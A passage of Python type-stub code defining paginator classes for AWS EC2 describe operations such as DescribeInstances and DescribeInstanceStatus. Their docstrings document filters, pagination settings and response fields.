        A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
        * DescribeAvailabilityZones
        * DescribeImages
        * DescribeInstances
        * DescribeKeyPairs
        * DescribeSecurityGroups
        * DescribeSnapshots
        * DescribeSubnets
        * DescribeTags
        * DescribeVolumes
        * DescribeVpcs
        - **Name** *(string) --*
        The name of the filter. Filter names are case-sensitive.
        - **Values** *(list) --*
        The filter values. Filter values are case-sensitive.
        - *(string) --*
        :type ImportTaskIds: list
        :param ImportTaskIds:
        A list of import image task IDs.
        - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
        A dictionary that provides parameters to control pagination.
        - **MaxItems** *(integer) --*
        The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
        - **PageSize** *(integer) --*
        The size of each page.
        - **StartingToken** *(string) --*
        A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeImportSnapshotTasks(Paginator):
    """Paginator for :py:meth:`EC2.Client.describe_import_snapshot_tasks`."""

    def paginate(self, DryRun: bool = None, Filters: List = None, ImportTaskIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_import_snapshot_tasks`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeImportSnapshotTasks>`_

        Each response page contains an ``ImportSnapshotTasks`` list with zero or
        more import snapshot tasks that are currently active or were completed or
        canceled in the previous 7 days. Every entry carries a ``Description``, an
        ``ImportTaskId`` and a ``SnapshotTaskDetail`` dict (``Description``,
        ``DiskImageSize`` in GiB, ``Encrypted``, ``Format``, ``KmsKeyId``,
        ``Progress``, ``SnapshotId``, ``Status``, ``StatusMessage``, ``Url`` and a
        ``UserBucket`` dict with ``S3Bucket``/``S3Key``).

        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for the
            action, without actually making the request, and provides an error
            response. If you have the required permissions, the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type Filters: list
        :param Filters: The filters. Each filter is a dict with a ``Name``
            (string) and ``Values`` (list of strings); both names and values are
            case-sensitive.
        :type ImportTaskIds: list
        :param ImportTaskIds: A list of import snapshot task IDs (strings).
        :type PaginationConfig: dict
        :param PaginationConfig: Pagination controls: ``MaxItems`` (total number
            of items to return; a ``NextToken`` is provided when more are
            available), ``PageSize`` (size of each page) and ``StartingToken``
            (the ``NextToken`` from a previous response).
        :rtype: dict
        :returns: A page of results containing ``ImportSnapshotTasks``.
        """
        pass
class DescribeInstanceCreditSpecifications(Paginator):
    """Paginator for :py:meth:`EC2.Client.describe_instance_credit_specifications`."""

    def paginate(self, DryRun: bool = None, Filters: List = None, InstanceIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_instance_credit_specifications`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeInstanceCreditSpecifications>`_

        Each response page contains an ``InstanceCreditSpecifications`` list
        describing the credit option for CPU usage of T2 or T3 instances. Every
        entry is a dict with ``InstanceId`` (string) and ``CpuCredits`` (string;
        valid values are ``standard`` and ``unlimited``).

        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for the
            action, without actually making the request, and provides an error
            response. If you have the required permissions, the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type Filters: list
        :param Filters: The filters, e.g. ``instance-id`` (the ID of the
            instance). Each filter is a dict with a ``Name`` (string) and
            ``Values`` (list of strings); both are case-sensitive.
        :type InstanceIds: list
        :param InstanceIds: The instance IDs (strings). Default: describes all
            your instances. Constraints: maximum 1000 explicitly specified
            instance IDs.
        :type PaginationConfig: dict
        :param PaginationConfig: Pagination controls: ``MaxItems`` (total number
            of items to return; a ``NextToken`` is provided when more are
            available), ``PageSize`` (size of each page) and ``StartingToken``
            (the ``NextToken`` from a previous response).
        :rtype: dict
        :returns: A page of results containing ``InstanceCreditSpecifications``.
        """
        pass
class DescribeInstanceStatus(Paginator):
    """Paginator for :py:meth:`EC2.Client.describe_instance_status`."""

    def paginate(self, Filters: List = None, InstanceIds: List = None, DryRun: bool = None, IncludeAllInstances: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_instance_status`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeInstanceStatus>`_

        Each response page contains an ``InstanceStatuses`` list. Every entry
        describes one instance's status: its ``AvailabilityZone``; any scheduled
        ``Events`` (``InstanceEventId``, ``Code``, ``Description``, ``NotAfter``,
        ``NotBefore``, ``NotBeforeDeadline``); the ``InstanceId``; the
        ``InstanceState`` (16-bit ``Code`` whose low byte holds the state —
        0 pending, 16 running, 32 shutting-down, 48 terminated, 64 stopping,
        80 stopped — plus ``Name``); and ``InstanceStatus``/``SystemStatus``
        dicts reporting impaired functionality internal to the instance and in
        the systems supporting it, each with a ``Status`` and a ``Details`` list
        (``ImpairedSince``, ``Name``, ``Status``).

        :type Filters: list
        :param Filters: The filters, for example: ``availability-zone``,
            ``event.code``, ``event.description``, ``event.instance-event-id``,
            ``event.not-after``, ``event.not-before``,
            ``event.not-before-deadline``, ``instance-state-code``,
            ``instance-state-name``, ``instance-status.reachability``,
            ``instance-status.status``, ``system-status.reachability`` and
            ``system-status.status``. Each filter is a dict with a ``Name``
            (string) and ``Values`` (list of strings); both are case-sensitive.
        :type InstanceIds: list
        :param InstanceIds: The instance IDs (strings). Default: describes all
            your instances. Constraints: maximum 100 explicitly specified
            instance IDs.
        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for the
            action, without actually making the request, and provides an error
            response. If you have the required permissions, the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type IncludeAllInstances: boolean
        :param IncludeAllInstances: When ``true``, includes the health status for
            all instances. When ``false``, includes the health status for running
            instances only. Default: ``false``.
        :type PaginationConfig: dict
        :param PaginationConfig: Pagination controls: ``MaxItems`` (total number
            of items to return; a ``NextToken`` is provided when more are
            available), ``PageSize`` (size of each page) and ``StartingToken``
            (the ``NextToken`` from a previous response).
        :rtype: dict
        :returns: A page of results containing ``InstanceStatuses``.
        """
        pass
class DescribeInstances(Paginator):
def paginate(self, Filters: List = None, InstanceIds: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_instances`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeInstances>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
InstanceIds=[
'string',
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Reservations': [
{
'Groups': [
{
'GroupName': 'string',
'GroupId': 'string'
},
],
'Instances': [
{
'AmiLaunchIndex': 123,
'ImageId': 'string',
'InstanceId': 'string',
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.l
arge'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'KernelId': 'string',
'KeyName': 'string',
'LaunchTime': datetime(2015, 1, 1),
'Monitoring': {
'State': 'disabled'|'disabling'|'enabled'|'pending'
},
'Placement': {
'AvailabilityZone': 'string',
'Affinity': 'string',
'GroupName': 'string',
'PartitionNumber': 123,
'HostId': 'string',
'Tenancy': 'default'|'dedicated'|'host',
'SpreadDomain': 'string'
},
'Platform': 'Windows',
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string',
'ProductCodes': [
{
'ProductCodeId': 'string',
'ProductCodeType': 'devpay'|'marketplace'
},
],
'PublicDnsName': 'string',
'PublicIpAddress': 'string',
'RamdiskId': 'string',
'State': {
'Code': 123,
'Name': 'pending'|'running'|'shutting-down'|'terminated'|'stopping'|'stopped'
},
'StateTransitionReason': 'string',
'SubnetId': 'string',
'VpcId': 'string',
'Architecture': 'i386'|'x86_64'|'arm64',
'BlockDeviceMappings': [
{
'DeviceName': 'string',
'Ebs': {
'AttachTime': datetime(2015, 1, 1),
'DeleteOnTermination': True|False,
'Status': 'attaching'|'attached'|'detaching'|'detached',
'VolumeId': 'string'
}
},
],
'ClientToken': 'string',
'EbsOptimized': True|False,
'EnaSupport': True|False,
'Hypervisor': 'ovm'|'xen',
'IamInstanceProfile': {
'Arn': 'string',
'Id': 'string'
},
'InstanceLifecycle': 'spot'|'scheduled',
'ElasticGpuAssociations': [
{
'ElasticGpuId': 'string',
'ElasticGpuAssociationId': 'string',
'ElasticGpuAssociationState': 'string',
'ElasticGpuAssociationTime': 'string'
},
],
'ElasticInferenceAcceleratorAssociations': [
{
'ElasticInferenceAcceleratorArn': 'string',
'ElasticInferenceAcceleratorAssociationId': 'string',
'ElasticInferenceAcceleratorAssociationState': 'string',
'ElasticInferenceAcceleratorAssociationTime': datetime(2015, 1, 1)
},
],
'NetworkInterfaces': [
{
'Association': {
'IpOwnerId': 'string',
'PublicDnsName': 'string',
'PublicIp': 'string'
},
'Attachment': {
'AttachTime': datetime(2015, 1, 1),
'AttachmentId': 'string',
'DeleteOnTermination': True|False,
'DeviceIndex': 123,
'Status': 'attaching'|'attached'|'detaching'|'detached'
},
'Description': 'string',
'Groups': [
{
'GroupName': 'string',
'GroupId': 'string'
},
],
'Ipv6Addresses': [
{
'Ipv6Address': 'string'
},
],
'MacAddress': 'string',
'NetworkInterfaceId': 'string',
'OwnerId': 'string',
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string',
'PrivateIpAddresses': [
{
'Association': {
'IpOwnerId': 'string',
'PublicDnsName': 'string',
'PublicIp': 'string'
},
'Primary': True|False,
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string'
},
],
'SourceDestCheck': True|False,
'Status': 'available'|'associated'|'attaching'|'in-use'|'detaching',
'SubnetId': 'string',
'VpcId': 'string',
'InterfaceType': 'string'
},
],
'RootDeviceName': 'string',
'RootDeviceType': 'ebs'|'instance-store',
'SecurityGroups': [
{
'GroupName': 'string',
'GroupId': 'string'
},
],
'SourceDestCheck': True|False,
'SpotInstanceRequestId': 'string',
'SriovNetSupport': 'string',
'StateReason': {
'Code': 'string',
'Message': 'string'
},
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'VirtualizationType': 'hvm'|'paravirtual',
'CpuOptions': {
'CoreCount': 123,
'ThreadsPerCore': 123
},
'CapacityReservationId': 'string',
'CapacityReservationSpecification': {
'CapacityReservationPreference': 'open'|'none',
'CapacityReservationTarget': {
'CapacityReservationId': 'string'
}
},
'HibernationOptions': {
'Configured': True|False
},
'Licenses': [
{
'LicenseConfigurationArn': 'string'
},
]
},
],
'OwnerId': 'string',
'RequesterId': 'string',
'ReservationId': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **Reservations** *(list) --*
Information about the reservations.
- *(dict) --*
Describes a reservation.
- **Groups** *(list) --*
[EC2-Classic only] The security groups.
- *(dict) --*
Describes a security group.
- **GroupName** *(string) --*
The name of the security group.
- **GroupId** *(string) --*
The ID of the security group.
- **Instances** *(list) --*
The instances.
- *(dict) --*
Describes an instance.
- **AmiLaunchIndex** *(integer) --*
The AMI launch index, which can be used to find this instance in the launch group.
- **ImageId** *(string) --*
The ID of the AMI used to launch the instance.
- **InstanceId** *(string) --*
The ID of the instance.
- **InstanceType** *(string) --*
The instance type.
- **KernelId** *(string) --*
The kernel associated with this instance, if applicable.
- **KeyName** *(string) --*
The name of the key pair, if this instance was launched with an associated key pair.
- **LaunchTime** *(datetime) --*
The time the instance was launched.
- **Monitoring** *(dict) --*
The monitoring for the instance.
- **State** *(string) --*
Indicates whether detailed monitoring is enabled. Otherwise, basic monitoring is enabled.
- **Placement** *(dict) --*
The location where the instance launched, if applicable.
- **AvailabilityZone** *(string) --*
The Availability Zone of the instance.
If not specified, an Availability Zone will be automatically chosen for you based on the load balancing criteria for the region.
- **Affinity** *(string) --*
The affinity setting for the instance on the Dedicated Host. This parameter is not supported for the ImportInstance command.
- **GroupName** *(string) --*
The name of the placement group the instance is in.
- **PartitionNumber** *(integer) --*
The number of the partition the instance is in. Valid only if the placement group strategy is set to ``partition`` .
- **HostId** *(string) --*
The ID of the Dedicated Host on which the instance resides. This parameter is not supported for the ImportInstance command.
- **Tenancy** *(string) --*
The tenancy of the instance (if the instance is running in a VPC). An instance with a tenancy of ``dedicated`` runs on single-tenant hardware. The ``host`` tenancy is not supported for the ImportInstance command.
- **SpreadDomain** *(string) --*
Reserved for future use.
- **Platform** *(string) --*
The value is ``Windows`` for Windows instances; otherwise blank.
- **PrivateDnsName** *(string) --*
(IPv4 only) The private DNS hostname name assigned to the instance. This DNS hostname can only be used inside the Amazon EC2 network. This name is not available until the instance enters the ``running`` state.
[EC2-VPC] The Amazon-provided DNS server resolves Amazon-provided private DNS hostnames if you've enabled DNS resolution and DNS hostnames in your VPC. If you are not using the Amazon-provided DNS server in your VPC, your custom domain name servers must resolve the hostname as appropriate.
- **PrivateIpAddress** *(string) --*
The private IPv4 address assigned to the instance.
- **ProductCodes** *(list) --*
The product codes attached to this instance, if applicable.
- *(dict) --*
Describes a product code.
- **ProductCodeId** *(string) --*
The product code.
- **ProductCodeType** *(string) --*
The type of product code.
- **PublicDnsName** *(string) --*
(IPv4 only) The public DNS name assigned to the instance. This name is not available until the instance enters the ``running`` state. For EC2-VPC, this name is only available if you've enabled DNS hostnames for your VPC.
- **PublicIpAddress** *(string) --*
The public IPv4 address assigned to the instance, if applicable.
- **RamdiskId** *(string) --*
The RAM disk associated with this instance, if applicable.
- **State** *(dict) --*
The current state of the instance.
- **Code** *(integer) --*
The state of the instance as a 16-bit unsigned integer.
The high byte is all of the bits between 2^8 and (2^16)-1, which equals decimal values between 256 and 65,535. These numerical values are used for internal purposes and should be ignored.
The low byte is all of the bits between 2^0 and (2^8)-1, which equals decimal values between 0 and 255.
The valid values for instance-state-code will all be in the range of the low byte and they are:
* ``0`` : ``pending``
* ``16`` : ``running``
* ``32`` : ``shutting-down``
* ``48`` : ``terminated``
* ``64`` : ``stopping``
* ``80`` : ``stopped``
You can ignore the high byte value by zeroing out all of the bits above 2^8 or 256 in decimal.
- **Name** *(string) --*
The current state of the instance.
- **StateTransitionReason** *(string) --*
The reason for the most recent state transition. This might be an empty string.
- **SubnetId** *(string) --*
[EC2-VPC] The ID of the subnet in which the instance is running.
- **VpcId** *(string) --*
[EC2-VPC] The ID of the VPC in which the instance is running.
- **Architecture** *(string) --*
The architecture of the image.
- **BlockDeviceMappings** *(list) --*
Any block device mapping entries for the instance.
- *(dict) --*
Describes a block device mapping.
- **DeviceName** *(string) --*
The device name (for example, ``/dev/sdh`` or ``xvdh`` ).
- **Ebs** *(dict) --*
Parameters used to automatically set up EBS volumes when the instance is launched.
- **AttachTime** *(datetime) --*
The time stamp when the attachment initiated.
- **DeleteOnTermination** *(boolean) --*
Indicates whether the volume is deleted on instance termination.
- **Status** *(string) --*
The attachment state.
- **VolumeId** *(string) --*
The ID of the EBS volume.
- **ClientToken** *(string) --*
The idempotency token you provided when you launched the instance, if applicable.
- **EbsOptimized** *(boolean) --*
Indicates whether the instance is optimized for Amazon EBS I/O. This optimization provides dedicated throughput to Amazon EBS and an optimized configuration stack to provide optimal I/O performance. This optimization isn't available with all instance types. Additional usage charges apply when using an EBS Optimized instance.
- **EnaSupport** *(boolean) --*
Specifies whether enhanced networking with ENA is enabled.
- **Hypervisor** *(string) --*
The hypervisor type of the instance.
- **IamInstanceProfile** *(dict) --*
The IAM instance profile associated with the instance, if applicable.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the instance profile.
- **Id** *(string) --*
The ID of the instance profile.
- **InstanceLifecycle** *(string) --*
Indicates whether this is a Spot Instance or a Scheduled Instance.
- **ElasticGpuAssociations** *(list) --*
The Elastic GPU associated with the instance.
- *(dict) --*
Describes the association between an instance and an Elastic Graphics accelerator.
- **ElasticGpuId** *(string) --*
The ID of the Elastic Graphics accelerator.
- **ElasticGpuAssociationId** *(string) --*
The ID of the association.
- **ElasticGpuAssociationState** *(string) --*
The state of the association between the instance and the Elastic Graphics accelerator.
- **ElasticGpuAssociationTime** *(string) --*
The time the Elastic Graphics accelerator was associated with the instance.
- **ElasticInferenceAcceleratorAssociations** *(list) --*
The elastic inference accelerator associated with the instance.
- *(dict) --*
Describes the association between an instance and an elastic inference accelerator.
- **ElasticInferenceAcceleratorArn** *(string) --*
The Amazon Resource Name (ARN) of the elastic inference accelerator.
- **ElasticInferenceAcceleratorAssociationId** *(string) --*
The ID of the association.
- **ElasticInferenceAcceleratorAssociationState** *(string) --*
The state of the elastic inference accelerator.
- **ElasticInferenceAcceleratorAssociationTime** *(datetime) --*
The time at which the elastic inference accelerator is associated with an instance.
- **NetworkInterfaces** *(list) --*
[EC2-VPC] The network interfaces for the instance.
- *(dict) --*
Describes a network interface.
- **Association** *(dict) --*
The association information for an Elastic IPv4 associated with the network interface.
- **IpOwnerId** *(string) --*
The ID of the owner of the Elastic IP address.
- **PublicDnsName** *(string) --*
The public DNS name.
- **PublicIp** *(string) --*
The public IP address or Elastic IP address bound to the network interface.
- **Attachment** *(dict) --*
The network interface attachment.
- **AttachTime** *(datetime) --*
The time stamp when the attachment initiated.
- **AttachmentId** *(string) --*
The ID of the network interface attachment.
- **DeleteOnTermination** *(boolean) --*
Indicates whether the network interface is deleted when the instance is terminated.
- **DeviceIndex** *(integer) --*
The index of the device on the instance for the network interface attachment.
- **Status** *(string) --*
The attachment state.
- **Description** *(string) --*
The description.
- **Groups** *(list) --*
One or more security groups.
- *(dict) --*
Describes a security group.
- **GroupName** *(string) --*
The name of the security group.
- **GroupId** *(string) --*
The ID of the security group.
- **Ipv6Addresses** *(list) --*
One or more IPv6 addresses associated with the network interface.
- *(dict) --*
Describes an IPv6 address.
- **Ipv6Address** *(string) --*
The IPv6 address.
- **MacAddress** *(string) --*
The MAC address.
- **NetworkInterfaceId** *(string) --*
The ID of the network interface.
- **OwnerId** *(string) --*
The ID of the AWS account that created the network interface.
- **PrivateDnsName** *(string) --*
The private DNS name.
- **PrivateIpAddress** *(string) --*
The IPv4 address of the network interface within the subnet.
- **PrivateIpAddresses** *(list) --*
One or more private IPv4 addresses associated with the network interface.
- *(dict) --*
Describes a private IPv4 address.
- **Association** *(dict) --*
The association information for an Elastic IP address for the network interface.
- **IpOwnerId** *(string) --*
The ID of the owner of the Elastic IP address.
- **PublicDnsName** *(string) --*
The public DNS name.
- **PublicIp** *(string) --*
The public IP address or Elastic IP address bound to the network interface.
- **Primary** *(boolean) --*
Indicates whether this IPv4 address is the primary private IP address of the network interface.
- **PrivateDnsName** *(string) --*
The private IPv4 DNS name.
- **PrivateIpAddress** *(string) --*
The private IPv4 address of the network interface.
- **SourceDestCheck** *(boolean) --*
Indicates whether to validate network traffic to or from this network interface.
- **Status** *(string) --*
The status of the network interface.
- **SubnetId** *(string) --*
The ID of the subnet.
- **VpcId** *(string) --*
The ID of the VPC.
- **InterfaceType** *(string) --*
Describes the type of network interface.
- **RootDeviceName** *(string) --*
The device name of the root device volume (for example, ``/dev/sda1`` ).
- **RootDeviceType** *(string) --*
The root device type used by the AMI. The AMI can use an EBS volume or an instance store volume.
- **SecurityGroups** *(list) --*
The security groups for the instance.
- *(dict) --*
Describes a security group.
- **GroupName** *(string) --*
The name of the security group.
- **GroupId** *(string) --*
The ID of the security group.
- **SourceDestCheck** *(boolean) --*
Specifies whether to enable an instance launched in a VPC to perform NAT. This controls whether source/destination checking is enabled on the instance. A value of ``true`` means that checking is enabled, and ``false`` means that checking is disabled. The value must be ``false`` for the instance to perform NAT. For more information, see `NAT Instances <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/VPC_NAT_Instance.html>`__ in the *Amazon Virtual Private Cloud User Guide* .
- **SpotInstanceRequestId** *(string) --*
If the request is a Spot Instance request, the ID of the request.
- **SriovNetSupport** *(string) --*
Specifies whether enhanced networking with the Intel 82599 Virtual Function interface is enabled.
- **StateReason** *(dict) --*
The reason for the most recent state transition.
- **Code** *(string) --*
The reason code for the state change.
- **Message** *(string) --*
The message for the state change.
* ``Server.InsufficientInstanceCapacity`` : There was insufficient capacity available to satisfy the launch request.
* ``Server.InternalError`` : An internal error caused the instance to terminate during launch.
* ``Server.ScheduledStop`` : The instance was stopped due to a scheduled retirement.
* ``Server.SpotInstanceShutdown`` : The instance was stopped because the number of Spot requests with a maximum price equal to or higher than the Spot price exceeded available capacity or because of an increase in the Spot price.
* ``Server.SpotInstanceTermination`` : The instance was terminated because the number of Spot requests with a maximum price equal to or higher than the Spot price exceeded available capacity or because of an increase in the Spot price.
* ``Client.InstanceInitiatedShutdown`` : The instance was shut down using the ``shutdown -h`` command from the instance.
* ``Client.InstanceTerminated`` : The instance was terminated or rebooted during AMI creation.
* ``Client.InternalError`` : A client error caused the instance to terminate during launch.
* ``Client.InvalidSnapshot.NotFound`` : The specified snapshot was not found.
* ``Client.UserInitiatedHibernate`` : Hibernation was initiated on the instance.
* ``Client.UserInitiatedShutdown`` : The instance was shut down using the Amazon EC2 API.
* ``Client.VolumeLimitExceeded`` : The limit on the number of EBS volumes or total storage was exceeded. Decrease usage or request an increase in your account limits.
- **Tags** *(list) --*
Any tags assigned to the instance.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **VirtualizationType** *(string) --*
The virtualization type of the instance.
- **CpuOptions** *(dict) --*
The CPU options for the instance.
- **CoreCount** *(integer) --*
The number of CPU cores for the instance.
- **ThreadsPerCore** *(integer) --*
The number of threads per CPU core.
- **CapacityReservationId** *(string) --*
The ID of the Capacity Reservation.
- **CapacityReservationSpecification** *(dict) --*
Information about the Capacity Reservation targeting option.
- **CapacityReservationPreference** *(string) --*
Describes the instance's Capacity Reservation preferences. Possible preferences include:
* ``open`` - The instance can run in any ``open`` Capacity Reservation that has matching attributes (instance type, platform, Availability Zone).
* ``none`` - The instance avoids running in a Capacity Reservation even if one is available. The instance runs in On-Demand capacity.
- **CapacityReservationTarget** *(dict) --*
Information about the targeted Capacity Reservation.
- **CapacityReservationId** *(string) --*
The ID of the Capacity Reservation.
- **HibernationOptions** *(dict) --*
Indicates whether the instance is enabled for hibernation.
- **Configured** *(boolean) --*
If this parameter is set to ``true`` , your instance is enabled for hibernation; otherwise, it is not enabled for hibernation.
- **Licenses** *(list) --*
The license configurations.
- *(dict) --*
Describes a license configuration.
- **LicenseConfigurationArn** *(string) --*
The Amazon Resource Name (ARN) of the license configuration.
- **OwnerId** *(string) --*
The ID of the AWS account that owns the reservation.
- **RequesterId** *(string) --*
The ID of the requester that launched the instances on your behalf (for example, AWS Management Console or Auto Scaling).
- **ReservationId** *(string) --*
The ID of the reservation.
:type Filters: list
:param Filters:
The filters.
* ``affinity`` - The affinity setting for an instance running on a Dedicated Host (``default`` | ``host`` ).
* ``architecture`` - The instance architecture (``i386`` | ``x86_64`` ).
* ``availability-zone`` - The Availability Zone of the instance.
* ``block-device-mapping.attach-time`` - The attach time for an EBS volume mapped to the instance, for example, ``2010-09-15T17:15:20.000Z`` .
* ``block-device-mapping.delete-on-termination`` - A Boolean that indicates whether the EBS volume is deleted on instance termination.
* ``block-device-mapping.device-name`` - The device name specified in the block device mapping (for example, ``/dev/sdh`` or ``xvdh`` ).
* ``block-device-mapping.status`` - The status for the EBS volume (``attaching`` | ``attached`` | ``detaching`` | ``detached`` ).
* ``block-device-mapping.volume-id`` - The volume ID of the EBS volume.
* ``client-token`` - The idempotency token you provided when you launched the instance.
* ``dns-name`` - The public DNS name of the instance.
* ``group-id`` - The ID of the security group for the instance. EC2-Classic only.
* ``group-name`` - The name of the security group for the instance. EC2-Classic only.
* ``hibernation-options.configured`` - A Boolean that indicates whether the instance is enabled for hibernation. A value of ``true`` means that the instance is enabled for hibernation.
* ``host-id`` - The ID of the Dedicated Host on which the instance is running, if applicable.
* ``hypervisor`` - The hypervisor type of the instance (``ovm`` | ``xen`` ).
* ``iam-instance-profile.arn`` - The instance profile associated with the instance. Specified as an ARN.
* ``image-id`` - The ID of the image used to launch the instance.
* ``instance-id`` - The ID of the instance.
* ``instance-lifecycle`` - Indicates whether this is a Spot Instance or a Scheduled Instance (``spot`` | ``scheduled`` ).
* ``instance-state-code`` - The state of the instance, as a 16-bit unsigned integer. The high byte is used for internal purposes and should be ignored. The low byte is set based on the state represented. The valid values are: 0 (pending), 16 (running), 32 (shutting-down), 48 (terminated), 64 (stopping), and 80 (stopped).
* ``instance-state-name`` - The state of the instance (``pending`` | ``running`` | ``shutting-down`` | ``terminated`` | ``stopping`` | ``stopped`` ).
* ``instance-type`` - The type of instance (for example, ``t2.micro`` ).
* ``instance.group-id`` - The ID of the security group for the instance.
* ``instance.group-name`` - The name of the security group for the instance.
* ``ip-address`` - The public IPv4 address of the instance.
* ``kernel-id`` - The kernel ID.
* ``key-name`` - The name of the key pair used when the instance was launched.
* ``launch-index`` - When launching multiple instances, this is the index for the instance in the launch group (for example, 0, 1, 2, and so on).
* ``launch-time`` - The time when the instance was launched.
* ``monitoring-state`` - Indicates whether detailed monitoring is enabled (``disabled`` | ``enabled`` ).
